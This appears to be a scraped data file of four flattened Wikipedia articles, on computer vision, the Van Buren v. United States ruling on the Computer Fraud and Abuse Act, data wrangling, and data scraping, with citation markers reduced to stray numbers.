208 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Computer_vision | Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images,and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g. in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input to the retina in the human analog) into descriptions of the world that make sense to thought processes and can elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. The scientific discipline of computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, multi-dimensional data from a 3D scanner, 3D point clouds from LiDaR sensors, or medical scanning devices. The technological discipline of computer vision seeks to apply its theories and models to the construction of computer vision systems. Sub-domains of computer vision include scene reconstruction, object detection, event detection, activity recognition, video tracking, object recognition, 3D pose estimation, learning, indexing, motion estimation, visual servoing, 3D scene modeling, and image restoration. Adopting computer vision technology might be painstaking for organizations as there is no single-point solution for it. Very few companies provide a unified and distributed platform or Operating System where computer vision applications can be easily deployed and managed. Computer vision is an interdisciplinary field that deals with how computers can be made to gain high-level understanding from digital images or videos. From the perspective of engineering, it seeks to automate tasks that the human visual system can do. 5 6 7 "Computer vision is concerned with the automatic extraction, analysis, and understanding of useful information from a single image or a sequence of images. It involves the development of a theoretical and algorithmic basis to achieve automatic visual understanding. 8 As a scientific discipline, computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, or multi-dimensional data from a medical scanner. 9 As a technological discipline, computer vision seeks to apply its theories and models for the construction of computer vision systems. Machine vision refers to a systems engineering discipline, especially in the context of factory automation. In more recent times, the terms computer vision and machine vision have converged to a greater degree. 10 : 13 In the late 1960s, computer vision began at universities that were pioneering artificial intelligence. It was meant to mimic the human visual system as a stepping stone to endowing robots with intelligent behavior. 11 In 1966, it was believed that this could be achieved through an undergraduate summer project, 12 by attaching a camera to a computer and having it "describe what it saw". 13 14 What distinguished computer vision from the prevalent field of digital image processing at that time was a desire to extract three-dimensional structure from images with the goal of achieving full scene understanding. Studies in the 1970s formed the early foundations for many of the computer vision algorithms that exist today, including extraction of edges from images, labeling of lines, non-polyhedral and polyhedral modeling, representation of objects as interconnections of smaller structures, optical flow, and motion estimation. 11 The next decade saw studies based on more rigorous mathematical analysis and quantitative aspects of computer vision. These include the concept of scale-space, the inference of shape from various cues such as shading, texture and focus, and contour models known as snakes. Researchers also realized that many of these mathematical concepts could be treated within the same optimization framework as regularization and Markov random fields. 15 By the 1990s, some of the previous research topics became more active than others. Research in projective 3 D reconstructions led to better understanding of camera calibration. With the advent of optimization methods for camera calibration, it was realized that a lot of the ideas were already explored in bundle adjustment theory from the field of photogrammetry. This led to methods for sparse 3 D reconstructions of scenes from multiple images. Progress was made on the dense stereo correspondence problem and further multi-view stereo techniques. At the same time, variations of graph cut were used to solve image segmentation. This decade also marked the first time statistical learning techniques were used in practice to recognize faces in images (see Eigenface). Toward the end of the 1990s, a significant change came about with the increased interaction between the fields of computer graphics and computer vision. This included image-based rendering, image morphing, view interpolation, panoramic image stitching and early light-field rendering. 11 Recent work has seen the resurgence of feature-based methods used in conjunction with machine learning techniques and complex optimization frameworks. 16 17 The advancement of Deep Learning techniques has brought further life to the field of computer vision. The accuracy of deep learning algorithms on several benchmark computer vision data sets for tasks ranging from classification, 18 segmentation and optical flow has surpassed prior methods. citation needed 19 Solid-state physics is another field that is closely related to computer vision. Most computer vision systems rely on image sensors, which detect electromagnetic radiation, which is typically in the form of either visible, infrared or ultraviolet light. The sensors are designed using quantum physics. The process by which light interacts with surfaces is explained using physics. Physics explains the behavior of optics which are a core part of most imaging systems. Sophisticated image sensors even require quantum mechanics to provide a complete understanding of the image formation process. 11 Also, various measurement problems in physics can be addressed using computer vision, for example, motion in fluids. Neurobiology has greatly influenced the development of computer vision algorithms. Over the last century, there has been an extensive study of eyes, neurons, and brain structures devoted to the processing of visual stimuli in both humans and various animals. This has led to a coarse yet convoluted description of how natural vision systems operate in order to solve certain vision-related tasks. These results have led to a sub-field within computer vision where artificial systems are designed to mimic the processing and behavior of biological systems at different levels of complexity. Also, some of the learning-based methods developed within computer vision (e.g. neural net and deep learning based image and feature analysis and classification) have their background in neurobiology. The Neocognitron, a neural network developed in the 1970s by Kunihiko Fukushima, is an early example of computer vision taking direct inspiration from neurobiology, specifically the primary visual cortex. Some strands of computer vision research are closely related to the study of biological vision—indeed, just as many strands of AI research are closely tied with research into human intelligence and the use of stored knowledge to interpret, integrate, and utilize visual information. The field of biological vision studies and models the physiological processes behind visual perception in humans and other animals. Computer vision, on the other hand, develops and describes the algorithms implemented in software and hardware behind artificial vision systems. An interdisciplinary exchange between biological and computer vision has proven fruitful for both fields. 21 Yet another field related to computer vision is signal processing. Many methods for processing one-variable signals, typically temporal signals, can be extended in a natural way to the processing of two-variable signals or multi-variable signals in computer vision. However, because of the specific nature of images, there are many methods developed within computer vision that have no counterpart in the processing of one-variable signals. Together with the multi-dimensionality of the signal, this defines a subfield in signal processing as a part of computer vision. Robot navigation sometimes deals with autonomous path planning or deliberation for robotic systems to navigate through an environment. 22 A detailed understanding of these environments is required to navigate through them. Information about the environment could be provided by a computer vision system, acting as a vision sensor and providing high-level information about the environment and the robot Besides the above-mentioned views on computer vision, many of the related research topics can also be studied from a purely mathematical point of view. For example, many methods in computer vision are based on statistics, optimization or geometry. Finally, a significant part of the field is devoted to the implementation aspect of computer vision; how existing methods can be realized in various combinations of software and hardware, or how these methods can be modified in order to gain processing speed without losing too much performance. Computer vision is also used in fashion eCommerce, inventory management, patent search, furniture, and the beauty industry. 23 The fields most closely related to computer vision are image processing, image analysis and machine vision. There is a significant overlap in the range of techniques and applications that these cover. This implies that the basic techniques that are used and developed in these fields are similar, something which can be interpreted as there is only one field with different names. On the other hand, it appears to be necessary for research groups, scientific journals, conferences, and companies to present or market themselves as belonging specifically to one of these fields and, hence, various characterizations which distinguish each of the fields from the others have been presented. In image processing, the input is an image and the output is an image as well, whereas in computer vision, an image or a video is taken as an input and the output could be an enhanced image, an understanding of the content of an image or even behavior of a computer system based on such understanding. Computer graphics produces image data from 3D models, and computer vision often produces 3D models from image data. 24 There is also a trend towards a combination of the two disciplines, e.g., as explored in augmented reality. The following characterizations appear relevant but should not be taken as universally accepted: Photogrammetry also overlaps with computer vision, e.g., stereophotogrammetry vs. computer stereo vision. Applications range from tasks such as industrial machine vision systems which, say, inspect bottles speeding by on a production line, to research into artificial intelligence and computers or robots that can comprehend the world around them. The computer vision and machine vision fields have significant overlap. Computer vision covers the core technology of automated image analysis which is used in many fields. Machine vision usually refers to a process of combining automated image analysis with other methods and technologies to provide automated inspection and robot guidance in industrial applications. In many computer-vision applications, computers are pre-programmed to solve a particular task, but methods based on learning are now becoming increasingly common. Examples of applications of computer vision include systems for: One of the most prominent application fields is medical computer vision, or medical image processing, characterized by the extraction of information from image data to diagnose a patient. An example of this is the detection of tumours, arteriosclerosis or other malign changes, and a variety of dental pathologies; measurements of organ dimensions, blood flow, etc. are another example. It also supports medical research by providing new information: e.g., about the structure of the brain or the quality of medical treatments. Applications of computer vision in the medical area also include enhancement of images interpreted by humans—ultrasonic images or X-ray images, for example—to reduce the influence of noise. A second application area in computer vision is in industry, sometimes called machine vision, where information is extracted for the purpose of supporting a production process. One example is quality control where details or final products are being automatically inspected in order to find defects. One of the most prevalent fields for such inspection is the Wafer industry in which every single Wafer is being measured and inspected for inaccuracies or defects to prevent a computer chip from coming to market in an unusable manner. Another example is a measurement of the position and orientation of details to be picked up by a robot arm. Machine vision is also heavily used in the agricultural processes to remove undesirable foodstuff from bulk material, a process called optical sorting. 30 Military applications are probably one of the largest areas of computer vision citation needed . The obvious examples are the detection of enemy soldiers or vehicles and missile guidance. More advanced systems for missile guidance send the missile to an area rather than a specific target, and target selection is made when the missile reaches the area based on locally acquired image data. Modern military concepts, such as "battlefield awareness", imply that various sensors, including image sensors, provide a rich set of information about a combat scene that can be used to support strategic decisions. In this case, automatic processing of the data is used to reduce complexity and to fuse information from multiple sensors to increase reliability. One of the newer application areas is autonomous vehicles, which include submersibles, land-based vehicles (small robots with wheels, cars, or trucks), aerial vehicles, and unmanned aerial vehicles (UAV). The level of autonomy ranges from fully autonomous (unmanned) vehicles to vehicles where computer-vision-based systems support a driver or a pilot in various situations. Fully autonomous vehicles typically use computer vision for navigation, e.g., for knowing where they are or mapping their environment (SLAM), for detecting obstacles. It can also be used for detecting certain task-specific events, e.g., a UAV looking for forest fires. Examples of supporting systems are obstacle warning systems in cars, cameras and LiDAR sensors in vehicles, and systems for autonomous landing of aircraft. Several car manufacturers have demonstrated systems for autonomous driving of cars. There are ample examples of military autonomous vehicles ranging from advanced missiles to UAVs for recon missions or missile guidance. Space exploration is already being made with autonomous vehicles using computer vision, e.g., NASA's Curiosity and CNSA's Yutu 2 rover. Materials such as rubber and silicon are being used to create sensors that allow for applications such as detecting microundulations and calibrating robotic hands. Rubber can be used in order to create a mold that can be placed over a finger, inside of this mold would be multiple strain gauges. The finger mold and sensors could then be placed on top of a small sheet of rubber containing an array of rubber pins. A user can then wear the finger mold and trace a surface. A computer can then read the data from the strain gauges and measure if one or more of the pins are being pushed upward. If a pin is being pushed upward then the computer can recognize this as an imperfection in the surface. This sort of technology is useful in order to receive accurate data on imperfections on a very large surface. 31 Another variation of this finger mold sensor are sensors that contain a camera suspended in silicon. The silicon forms a dome around the outside of the camera and embedded in the silicon are point markers that are equally spaced. These cameras can then be placed on devices such as robotic hands in order to allow the computer to receive highly accurate tactile data. 32 Other application areas include: Each of the application areas described above employ a range of computer vision tasks; more or less well-defined measurement problems or processing problems, which can be solved using a variety of methods. Some examples of typical computer vision tasks are presented below. Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images, and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g., in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input of the retina) into descriptions of the world that can interface with other thought processes and elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. 37 The classical problem in computer vision, image processing, and machine vision is that of determining whether or not the image data contains some specific object, feature, or activity. Different varieties of recognition problem are described in the literature. 38 Currently, the best algorithms for such tasks are based on convolutional neural networks. An illustration of their capabilities is given by the ImageNet Large Scale Visual Recognition Challenge; this is a benchmark in object classification and detection, with millions of images and 1000 object classes used in the competition. 39 Performance of convolutional neural networks on the ImageNet tests is now close to that of humans. 39 The best algorithms still struggle with objects that are small or thin, such as a small ant on the stem of a flower or a person holding a quill in their hand. They also have trouble with images that have been distorted with filters (an increasingly common phenomenon with modern digital cameras). By contrast, those kinds of images rarely trouble humans. Humans, however, tend to have trouble with other issues. For example, they are not good at classifying objects into fine-grained classes, such as the particular breed of dog or species of bird, whereas convolutional neural networks handle this with ease. citation needed Several specialized tasks based on recognition exist, such as: Several tasks relate to motion estimation, where an image sequence is processed to produce an estimate of the velocity either at each points in the image or in the 3D scene or even of the camera that produces the images. Examples of such tasks are: Given one or (typically) more images of a scene, or a video, scene reconstruction aims at computing a 3D model of the scene. In the simplest case, the model can be a set of 3D points. More sophisticated methods produce a complete 3D surface model. The advent of 3D imaging not requiring motion or scanning, and related processing algorithms is enabling rapid advances in this field. Grid-based 3D sensing can be used to acquire 3D images from multiple angles. Algorithms are now available to stitch multiple 3D images together into point clouds and 3D models. 24 Image restoration comes into the picture when the original image is degraded or damaged due to some external factors like lens wrong positioning, transmission interference, low lighting or motion blurs, etc., which is referred to as noise. When the images are degraded or damaged, the information to be extracted from them also gets damaged. Therefore we need to recover or restore the image as it was intended to be. The aim of image restoration is the removal of noise (sensor noise, motion blur, etc.) from images. The simplest possible approach for noise removal is various types of filters, such as low-pass filters or median filters. More sophisticated methods assume a model of how the local image structures look to distinguish them from noise. By first analyzing the image data in terms of the local image structures, such as lines or edges, and then controlling the filtering based on local information from the analysis step, a better level of noise removal is usually obtained compared to the simpler approaches. An example in this field is inpainting. The organization of a computer vision system is highly application-dependent. Some systems are stand-alone applications that solve a specific measurement or detection problem, while others constitute a sub-system of a larger design which, for example, also contains sub-systems for control of mechanical actuators, planning, information databases, man-machine interfaces, etc. The specific implementation of a computer vision system also depends on whether its functionality is pre-specified or if some part of it can be learned or modified during operation. Many functions are unique to the application. There are, however, typical functions that are found in many computer vision systems. Image-understanding systems (IUS) include three levels of abstraction as follows: low level includes image primitives such as edges, texture elements, or regions; intermediate level includes boundaries, surfaces and volumes; and high level includes objects, scenes, or events. Many of these requirements are entirely topics for further research. The representational requirements in the designing of IUS for these levels are: representation of prototypical concepts, concept organization, spatial knowledge, temporal knowledge, scaling, and description by comparison and differentiation. While inference refers to the process of deriving new, not explicitly represented facts from currently known facts, control refers to the process that selects which of the many inference, search, and matching techniques should be applied at a particular stage of processing. Inference and control requirements for IUS are: search and hypothesis activation, matching and hypothesis testing, generation and use of expectations, change and focus of attention, certainty and strength of belief, inference and goal satisfaction. 46 There are many kinds of computer vision systems; however, all of them contain these basic elements: a power source, at least one image acquisition device (camera, ccd, etc.), a processor, and control and communication cables or some kind of wireless interconnection mechanism. In addition, a practical vision system contains software, as well as a display in order to monitor the system. Vision systems for inner spaces, as most industrial ones, contain an illumination system and may be placed in a controlled environment. Furthermore, a completed system includes many accessories, such as camera supports, cables, and connectors. Most computer vision systems use visible-light cameras passively viewing a scene at frame rates of at most 60 frames per second (usually far slower). A few computer vision systems use image-acquisition hardware with active illumination or something other than visible light or both, such as structured-light 3D scanners, thermographic cameras, hyperspectral imagers, radar imaging, lidar scanners, magnetic resonance images, side-scan sonar, synthetic aperture sonar, etc. Such hardware captures "images" that are then processed often using the same computer vision algorithms used to process visible-light images. While traditional broadcast and consumer video systems operate at a rate of 30 frames per second, advances in digital signal processing and consumer graphics hardware has made high-speed image acquisition, processing, and display possible for real-time systems on the order of hundreds to thousands of frames per second. For applications in robotics, fast, real-time video systems are critically important and often can simplify the processing needed for certain algorithms. When combined with a high-speed projector, fast image acquisition allows 3D measurement and feature tracking to be realized. 47 Egocentric vision systems are composed of a wearable camera that automatically take pictures from a first-person perspective. As of 2016, vision processing units are emerging as a new class of processors to complement CPUs and graphics processing units (GPUs) in this role. 48 |
209 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Van_Buren_v._United_States | Van Buren v. United States, 593 U.S. (2021), was a United States Supreme Court case dealing with the Computer Fraud and Abuse Act (CFAA) and its definition of "exceeds authorized access" in relation to one intentionally accessing a computer system they have authorization to access. In June 2021, the Supreme Court ruled in a 6 3 opinion that one "exceeds authorized access" by accessing off-limit files and other information on a computer system they were otherwise authorized to access. The CFAA's language had long created a circuit split in case law, and the Court's decision narrowed the applicability of CFAA in prosecuting cybersecurity and computer crime. The Computer Fraud and Abuse Act (CFAA) is a federal law passed in 1986 to strengthen laws around unauthorized access to computer systems. The law was passed partially based on fears from Congress members who saw the 1983 film WarGames. 1 Among its core statutes at 18 U.S.C. 1030(a)(2) is that intentionally accessing a computer system "without authorization or exceeds authorized access" to obtain protected information, financial records, or federal government information is considered a federal crime that can include fines and imprisonment as a penalty. The exact definition of "exceeds authorized access" is not clear and created a 4 3 circuit split of cases at the Circuit Courts. 2 In the First, Fifth, Seventh, and Eleventh Circuits, the courts upheld a broad view of the statement, that accessing a computer with authorization but for an improper purpose is a violation of the CFAA. The Second, Fourth, and Ninth Circuits took a more narrow view that a violation only occurs if the authorized user accesses information they were prohibited from accessing. 2 Because of the case law split, there has been debate on whether the language should be treated narrowly or broadly between cybersecurity researchers and law enforcement among others. For cybersecurity practitioners, a narrow interpretation of "exceeds authorized access" language in 1030(a)(2) would allow them to better conduct work identifying and resolving security problems with computer hardware and software as to make the Internet safer. The vagueness of the statute otherwise puts these job functions at risk. Law enforcement and the U.S. government in general prefer a broader interpretation as this allows them to prosecute those who use hacking to bring down or take advantage of insecure systems under the CFAA. 3 There are additional concerns as the language of CFAA, if broadly interpreted, could apply to commonly-accepted activities at businesses or elsewhere, such as using office computers for browsing the web. Jeffrey L. Fisher, a law professor at Stanford University who represents the petitioner in the present case, states that the law's language is outdated with modern computer usage, and its broad interpretation makes a crime out of ordinary breaches of computer restrictions and terms of service that people likely don’t even know about and if they did would have no reason to think would be a federal crime. 3 Police officer Nathan Van Buren, from Cumming, Georgia, was in need of money and asked a man, Andrew Albo, for help. Albo was known to have connections to prostitution in the town and had prior conflicts with the police. Albo reported this request to the local sheriff's office, where the request was passed to the Federal Bureau of Investigation (FBI). The FBI set up a sting operation and instructed Albo to offer Van Buren US$6,000, but in exchange, to request Van Buren look up a license plate on the Georgia Crime Information Center (GCIC) he had authorized access to, as to see if its registered owner, a stripper, was an undercover officer. Van Buren complied with the request, which led the FBI to arrest him for felony computer fraud under the CFAA 1030(a)(2). Van Buren was found guilty in a jury trial and sentenced to 18 months of prison by the United States District Court for the Northern District of Georgia. 2 Van Buren appealed the conviction to the United States Court of Appeals for the Eleventh Circuit, asserting that accessing the GCIC that he had authorized access to but for an improper purpose was not a violation of the "exceeds authorized access" clause of the CFAA. While the Circuit judges had some sympathy for this argument, they chose to rule on precedent from a prior Eleventh Circuit case, United States v. Rodriguez (2010), 4 to uphold Van Buren's conviction. 5 2 Van Buren petitioned to the Supreme Court, which granted certiorari in April 2020. 3 The case was argued on November 30, 2020, via telephone due to the COVID 19 pandemic. 6 The Court issued its decision on June 3, 2021. In a 6 3 decision, the Court reversed and remanded the lower court ruling. The majority opinion was written by Justice Amy Coney Barrett, joined by Justices Stephen Breyer, Sonia Sotomayor, Elena Kagan, Neil Gorsuch, and Brett Kavanaugh. Barrett ruled that for the CFAA, a person violates the "exceeds authorized access" language when they access files or other information that is off-limits to them on a computer system that they otherwise have authorized access to. The majority opinion distinguished this from Van Buren's case, in that the information that he obtained was within the limits of what he could access with his authorization, but was done for improper reasons, and thus he could not be charged under CFAA for this crime. 7 In the opinion Barrett agreed with critics of the law that if they had taken the government's stance that "the 'exceeds authorized access' clause criminalizes every violation of a computer-use policy", "then millions of otherwise law-abiding citizens are criminals. 8 Justice Clarence Thomas wrote the dissenting opinion joined by Chief Justice John Roberts and Justice Samuel Alito. Thomas wrote that many parts of federal law denote portions of law where a person may be given temporary access to property but still places limits on what they may do with that access, such as a valet parking a car, and that the majority had taken a contrived position. Thomas wrote "It is understandable to be uncomfortable with so much conduct being criminalized, but that discomfort does not give us authority to alter statutes. 8 This case is notable for being the first in which Justice Stephen Breyer assigned the majority opinion. Because the Chief Justice and Justice Thomas both dissented, Breyer, who is the second-most senior Associate Justice, was the most senior justice in the majority and so assigned the opinion. Breyer chose to assign this opinion to Justice Barrett, who was the newest justice at the time. 9 The Electronic Frontier Foundation, which had filed an amicus brief in the case stating that "the CFAA has hindered the work of 'security researchers' and opined that "the government’s broad interpretation of the CFAA" meant that "standard security research practices ... can be highly risky", 10 called the ruling "a victory for all Internet users" and "especially good news for security researchers". 11 The following week, on the basis of Van Buren, the Supreme Court vacated the Ninth Circuit's decision in hiQ Labs v. LinkedIn (2019) via order, in which hiQ had prevailed to be able to web scrape data from LinkedIn, which is owned by Microsoft. The Ninth Circuit had relied on the interpretation of CFAA that as LinkedIn's data was publicly available, Microsoft could not stop hiQ from collecting it even at a massive scale beyond the capabilities of a human. The Supreme Court vacated the ruling and instructed the Ninth Circuit to review the case under the Van Buren decision, which could incorporate web scraping as an improper act under CFAA within the Supreme Court's ruling. 12 |
210 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_wrangling | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure quality and useful data. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The "wrangler" non-technical term is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner the Emory University Libraries based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA NOAA Cold Lands Processes Experiment. 4 Cline stated the data wranglers "coordinate the acquisition of the entire collection of the experiment data. Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the upcoming of artificial intelligence in data science it has become increasingly important for automation of data wrangling to have very strict checks and balances, which is why the munging process of data has not been automated by machine learning. Data munging requires more than just an automated solution, it requires knowledge of what information should be removed and artificial intelligence is not to the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some data mining uses, but not always. The process of data mining is to find patterns within large data sets, where data wrangling transforms data in order to deliver insights about that data. Even though data wrangling is a superset of data mining does not mean that data mining does not use it, there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: say there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston, the data in the set related to the residents of Dallas is not useful to the overall set and can be removed before processing to improve the efficiency of the data mining process. With an increase of raw data comes an increase in the amount of data that is not inherently useful, this increases time spent on cleaning and organizing data before it can be analyzed which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data, it is important to ensure metadata is consistent otherwise it can cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly, achieve more accurate results, and because of this better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling are as follows: This all-encompassing term describes how to understand your data. This is the first step to familiarize yourself with your data. These steps are an iterative process that should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set to read. All names are now formatted the same way, first name last name , phone numbers are also formatted the same way area code-XXX-XXXX , dates are formatted numerically YYYY-mm-dd , and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), tools like KNIME or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skills sets within: R or Python, SQL, PHP, Scala, and more languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. Some of these also include embedded AI recommenders and programming by example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. Given a set of data that contains information on medical patients your goal is to find correlation for a disease. Before you can start iterating through the data ensure that you have an understanding of the result, are you looking for patients who have the disease? Are there other diseases that can be the cause? Once an understanding of the outcome is achieved then the data wrangling process can begin. Start by determining the structure of the outcome, what is important to understand the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed, this could include patients that have not been diagnosed with any disease. After cleaning look at the data again, is there anything that can be added to the data set that is already known that would benefit it? An example could be most common diseases in the area, America and India are very different when it comes to most common diseases. Now comes the validation step, determine validation rules for which data points need to be checked for validity, this could include date of birth or checking for specific diseases. After the validation step the data should now be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis as it will reduce the vast amount of data into something that can be easily analyzed for an accurate result. |
211 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-4 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
